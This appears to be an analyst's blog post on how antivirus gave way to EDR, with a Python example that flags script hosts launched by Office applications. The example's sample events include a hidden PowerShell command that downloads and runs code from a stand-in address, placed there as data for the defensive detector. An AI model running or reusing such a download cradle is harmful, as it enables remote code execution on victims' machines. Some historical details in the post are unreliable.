Walking Among the Valley of Kings: EDR Rising and the End of the Antivirus Era

It was 1971 when the first known virus, Creeper, began infecting PDP-10 mainframe computers manufactured by Digital Equipment Corporation (DEC). To remove it, Ray Tomlinson developed Reaper, the first known program written to hunt down and delete a virus. The first antivirus software in the modern sense followed in 1987, when German computer security expert Bernd Robert Fix wrote the first recorded program designed to remove the Vienna virus, which infected .com files on the DOS operating system. Later, the German company G Data Software AG released the first known antivirus product for Atari ST computers, followed shortly by McAfee, Inc. (later acquired by Intel), which released its first antivirus scanner, VirusScan, after its founding in 1987.

The antivirus industry would quickly mature over the next decade and a half, to 2003, when I, along with other cybersecurity engineers around the world, was working tirelessly to remediate SQL Slammer worm infections. Despite having antivirus software installed on our endpoints, these hosts were still becoming infected, underscoring what I always believed would be the eventual sunsetting of this traditional approach to antivirus. This worm outbreak required me, along with several colleagues, to stay in a nearby hotel and work throughout the day and night to clean the infections off hosts that, despite having Symantec Endpoint Protection installed, were still getting infected. Symantec's technical support team's response? Go download their individual cleaner tool, Symantec Eraser. The continuous effort to download updated DAT files was still ineffective at catching every variant, so their solution was to direct customers to their Eraser tool to clean infected hosts instead.

This is just one incident response event among many in my history, alongside penetration tests I performed where I was able to shut down specific antivirus software with a module within Metasploit Framework, upload a backdoor built with veil-framework to a compromised host that went unnoticed by the AV, and so on. But my stories are just a few among the thousands that exist in the annals of antivirus software failures, dating back to 1994 when I first started learning how to hack from hackers on IRC channels on EFnet (back when IRC was a "thing"), using dialup accounts to Concentric Internet Services (CRIS), my ProComm Plus dialer, and a 2400 baud modem (end nerd flashback).

Fast forward to 2002 and enter the EDR startup landscape: startups that came in attempting to unseat the old guard. Coincidentally enough, just six years later in 2008, as Endgame was making its debut, a hacking competition at the annual DEF CON security conference dubbed "Race to Zero" set out to show the world that legacy antivirus was indeed dead by having participants tweak known viruses in an attempt to slip past the signature-based blacklists of several major antivirus engines, despite the protests of several AV vendors at the mere idea of holding such a contest. The competition's organizer simply responded to the AV industry, "we're just pointing out the basic flaw in signature-based antivirus."

The contenders that would begin putting downward market pressure on the traditional antivirus companies, beginning in 2002, include Carbon Black, founded in 2002 (as Bit9, originally an application whitelisting vendor); CounterTack, 2004; Tanium, 2007; Endgame, 2008; CrowdStrike, 2011; Cybereason, 2012; Cylance, 2012; and SentinelOne in 2013, to name a select few. Note that the label "EDR" itself came later than the earliest of these companies: Gartner's Anton Chuvakin coined the term "endpoint threat detection and response" in 2013.

So what makes EDR different from traditional antivirus/EPP solutions?

  • They don't rely on signatures or patterns alone: EDR will typically use machine learning (ML) models and behavioral analysis to detect threats at the pre-, during-, and post-execution phases of a weaponized file or of file-less malware. Methods for performing this analysis across numerous solutions include static analysis of the file before it runs and behavioral analysis of what it does once running (marketed by some vendors as "static AI" and "behavioral AI"), rather than only looking for known byte patterns in the file, which makes evasion by re-packing or re-compiling a known sample far less effective against EDR. Most EDR products still carry hash and indicator blocklists as a cheap first layer; the difference is that detection no longer depends on them.

  • Contextual History: EDR is capable of piecing together the individual breadcrumbs of a malware infection and tracing them back to the originating process, presenting the entire thread of activity as a virtual storybook, such as the capability offered by SentinelOne (research report pending). This approach reflects the now widely held belief that an alert without context is of little use to an analyst.

  • Expanded Response Actions: Traditional antivirus typically deleted the file or quarantined it until an analyst could investigate it further. EDR, on the other hand, is capable of autonomous response without requiring human interaction, going as far as isolating a host from the network, auto-immunizing other endpoints against the same threat, and, as a final safety measure, rolling an endpoint back to a pre-infection state. One practical caveat: rollback on Windows generally depends on Volume Shadow Copy snapshots, which ransomware routinely deletes before encrypting, so the agent must protect those snapshots for the feature to hold up under a real attack.

  • Interrelationship tracking of processes: EDR also tracks every process and its relationships to other processes, regardless of how long it stays active or what spawned it. This lineage is what allows EDR to detect malware in files, scripts, and weaponized documents, as well as lateral movement and even file-less malware that never touches disk.

  • MITRE ATT&CK: EDR typically covers a much broader range of the MITRE ATT&CK matrix, including persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement, execution, and command and control.

  • Threat Hunting: EDR provides threat hunting capabilities to analysts that leverage machine learning and user entity behavior analytics (UEBA) to inform the analyst of potential risks. The analyst can leverage EDR to investigate potential risks -- tracking suspicious behavior in the network. The hypothesis formed by the hunt team using EDR can focus hunting efforts on known exploits, potential bad actors or assets, and data of value.
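The "contextual history" and "interrelationship tracking" items above describe the same underlying mechanism: the sensor records parent/child process relationships, and detection rules fire on behaviour seen across that lineage rather than on the bytes of any one file. The following is an added example written for this page, not code from the original post or from any EDR vendor. It reconstructs a process tree from constructed process-creation events (loosely modelled on the pid, parent pid, image and command line fields a Windows sensor such as Sysmon records), flags any script host whose ancestry includes an Office application, and reports the full chain back to the originating process. The event data, the 203.0.113.10 address and the rule sets are all constructed for illustration.

```python
"""Behavioural detection over process lineage, independent of file signatures.

Added example for illustration; not the original post's code and not any
vendor's implementation. Events below are constructed sample data.
"""
from __future__ import annotations

# Constructed sample events. A real EDR sensor streams these from the kernel
# as processes start; here they are embedded so the example runs offline.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 1820, "ppid": 400,
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "WINWORD.EXE invoice.docm"},
    {"pid": 2210, "ppid": 1820, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -c "
                "IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"},
    {"pid": 2244, "ppid": 2210,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c "
                "IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"},
    {"pid": 3100, "ppid": 400, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Constructed rule sets: applications that should not normally be launching
# script interpreters, and the interpreters an attacker typically reaches for.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


class ProcessTree:
    """Index of process-creation events keyed by pid, with lineage lookup."""

    def __init__(self, events: list[dict]):
        self.procs = {e["pid"]: e for e in events}

    def lineage(self, pid: int) -> list[dict]:
        """Return the chain from the earliest known ancestor down to pid.

        Stops when the parent is unknown to the sensor or when a pid repeats
        (pid reuse can otherwise produce a cycle).
        """
        chain, seen = [], set()
        while pid in self.procs and pid not in seen:
            seen.add(pid)
            chain.append(self.procs[pid])
            pid = self.procs[pid]["ppid"]
        return list(reversed(chain))


def office_spawned_script_host(tree: ProcessTree, pid: int) -> list[dict] | None:
    """Return the lineage if pid is a script host with an Office app as an ancestor.

    The rule keys on what spawned what, not on the hash of any binary, so
    re-packing the payload or changing the document does not affect it.
    """
    chain = tree.lineage(pid)
    names = [basename(p["image"]) for p in chain]
    if names and names[-1] in SCRIPT_HOSTS and any(n in OFFICE_APPS for n in names[:-1]):
        return chain
    return None


def scan(tree: ProcessTree) -> dict[int, str]:
    """Evaluate the rule for every process; map alerting pid to its lineage string."""
    alerts = {}
    for pid in tree.procs:
        chain = office_spawned_script_host(tree, pid)
        if chain:
            alerts[pid] = " -> ".join(basename(p["image"]) for p in chain)
    return alerts


if __name__ == "__main__":
    for pid, story in scan(ProcessTree(SAMPLE_EVENTS)).items():
        print(f"ALERT pid={pid}: {story}")
```

Two things are worth noticing. The alert for pid 2244 carries the whole story back to explorer.exe and the Word document, which is the "storybook" an analyst needs; the signature-era equivalent would have been a hash of a dropped file, if any file was dropped at all. Second, this toy rule matches on the image basename, which a renamed copy of powershell.exe would defeat; a production sensor keys on the PE's OriginalFileName field or the code signer instead, which is exactly the kind of detail that separates EDR products from one another.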

This is just a partial list, but you get my point. While not all EDR is created equal, it's important to note that EDR is indeed here to stay as Sand Hill Road pours more venture capital into this market, fueled by projections that the global EDR market will reach $5.9 Bn by 2025, growing at a CAGR of 28.8% between 2018 and 2025.

And there is certainly no shortage of evidence that legacy antivirus solutions are indeed on their way out, as my discussions with CISOs at companies of different sizes and in different markets testify to budgets being reallocated from legacy AV to EDR, the new shiny toy promising a brighter future in malware and ransomware detection and response. Simply put, CISOs are quickly growing tired of missed ransomware and malware that they see EDR as more effective in stopping, and they require more autonomous response capabilities from their solutions that don't rely on the human analysts they can't seem to hire or keep due to the global cybersecurity talent shortage.

While many of the legacy antivirus solutions have begun adding in EDR capabilities and will argue that they cover just as many if not more of the ATT&CK matrix, according to the CISOs I've interviewed, the old guard still faces a growing branding problem. Market perception is still heavily skewed towards seeing these companies as legacy antivirus despite having ML and autonomous response capabilities. These companies will need to invest heavily into market education on their new technology stacks that no longer include traditional detection and response approaches using only signatures.

While the legacy vendors that preceded EDR have begun expanding their flagship products to include EDR and CASB in an attempt to respond to market demands and to market share lost to the freshman class, the buying patterns of CISOs as they reallocate their budgets to EDR companies show that the old guard must innovate and educate to stay relevant or suffer the consequences of being relegated to the history books as short-reigning kings.

My next market report at Aite Group will cover the entire EDR landscape and profile the individual EDR vendors and the idiosyncratic differences between the solutions. If you're an EDR vendor and wish to make sure you're profiled in my upcoming market report, please have your Analyst Relations team contact me.
